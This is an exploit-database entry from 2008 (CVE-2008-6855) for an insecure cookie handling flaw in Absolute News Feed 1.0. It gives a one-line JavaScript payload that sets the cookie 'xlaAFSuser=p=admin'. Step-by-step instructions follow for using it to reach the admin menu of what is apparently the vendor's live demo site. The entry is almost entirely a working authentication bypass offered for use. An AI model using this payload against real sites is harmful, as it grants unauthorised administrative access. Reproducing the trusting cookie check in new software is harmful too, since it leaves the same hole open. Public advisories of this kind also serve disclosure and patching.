Absolute News Feed 1.0 - Remote Insecure Cookie Handling Vulnerability

2008-10-31T00:00:00
ID EDB-ID:6901
Type exploitdb
Reporter Hakxer
Modified 2008-10-31T00:00:00

Description

Absolute News Feed 1.0 Remote Insecure Cookie Handling Vulnerability. CVE-2008-6855. Webapps exploit for php platform

                                        
                                            ########################################################################
# Discovered by : Hakxer                                               #
# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com                      #
# -------------------------------                                      #
# Poc :                                                                #
# javascript:document.cookie="xlaAFSuser=p=admin";                     #
#                                                                      #
# [~] Exploit                                                          #
#                                                                      #
# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
# 								       #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
########################################################################

# milw0rm.com [2008-10-31]